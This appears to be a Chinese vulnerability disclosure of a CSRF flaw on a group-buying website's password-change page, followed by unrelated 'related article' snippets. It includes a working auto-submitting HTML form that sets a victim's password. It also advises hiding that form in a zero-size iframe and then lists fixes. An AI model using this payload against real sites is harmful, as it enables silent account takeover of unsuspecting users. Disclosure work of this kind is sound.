团购王csrf可劫持用户修改密码
修改密码处无验证token,并且无验证原密码(一个涉及money的站,修改密码居然没有验证原密码!!!),可以通过一个精心构造的表单欺骗用户修改密码。
<html>
<body>
<form name="csrf" action="http://www.go.cn/index.php?m=settings" method="POST">
<input type=text name=password value="woooooooyun"></input>
<input type=text name=password2 value="woooooooyun"></input>
<input type=text name=do value="update"></input>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
欺骗用户访问后,密码会被改成woooooooyun。
直接让用户访问太明显了,直接会跳转到“修改成功”的页面,所以可以准备一个看似正常的页面(如新闻),然后iframe这个POC,并且height=0,width=0,用户就会在不知情的情况下被修改密码,后果可想而知了。
修复方案:
1.修改密码一定要验证原密码
2.所有涉及用户信息的操作要验证随机的token.
相关推荐
-
怎么禁止win8系统的用户修改密码
随着科技的发展,电脑已经成为人们日常生活中必不可少的工具,最新的手机一般都配有win8系统,在win8系统中如何设置才能让用户无法修改密码呢?接下来就由小编来告诉大家.具体如下:1.第一步,打开电脑后 ...
-
asp.net用户修改密码的页面功能如何设计
用Microsoft Visual Studio 2005开发工具开发asp.net网站时,经常会涉及到让用户修改原来的密码,那么asp.net用户修改密码的页面功能如何设计?(这里只分享一下后台代码 ...
-
社区团购的东西靠谱吗(社区团购为什么那么便宜)
不知从何时起,低价成为了社区团购的代名词,在消费者的心智里"便宜"已经同社区团购划上等号.满打满算,社区团购的崛起不过一年时间,短短时间内就能占据低价的概念,究竟是何种原因造成的? ...
-
团购如何退货和投诉技巧
这几年,团购风头正劲,一时无两.如今团购存在许多问题,团购有陷阱,质量有问题,货不对板.服务注水.价外有价.退换货难--好吧,更悲催的是,被坑完,投诉难呀,没证据呀,相关法律空白呀.因为缺乏监管.行业 ...
-
Linux 无权限修改密码时该怎么做
Linux非root权限的用户无法修改密码时,可以通过修改属性的方法去获得修改权限 操作方法 01 如果在linux中,不管是root用户还是普通用户登录后,修改自己的密码,出现---passwd:A ...
-
支付宝钱包如何团购美食方法教程
首先,把手机的支付宝钱包更新到最新版,接着在支付宝钱包软件中点击底部栏的“探索”。在探索界面中,我们能够看到新增加的“附近”功能。在附近功能中选择“美食”。 在美食的选项中,用户可以查看到附近的餐厅美 ...
-
触宝拨号可以团购吗?触宝拨号团购美食的方法
触宝拨号如何团购美食?触宝拨号不仅能帮助用户快速查找联系人,还可以帮助用户们查看酒店、租车和机票的专线号码,方便用户拨打电话预定哦。触宝拨号还可以让用户查看当地城市的美食哦,方便我们能快速团购美食。想 ...
-
qq团购图标怎么点亮
免费点亮qq团购的方法: 1、当然有的时候因为是活动抽奖将图标点亮,找到qq团购上面的0圆商品抢购,然后找到【抽奖点亮图标】,然后根据指示操作即可点亮qq团购图标了。但是抽奖活动点亮图标期限时长只有1 ...
-
搜狗输入法将团购站订阅到搜狗是否需要安装搜狗输入法
搜狗输入法将团购站订阅到搜狗,需要预先安装搜狗输入法才可以使用此功能。对于没有安装输入法的用户,可以去官网下载搜狗输入法。
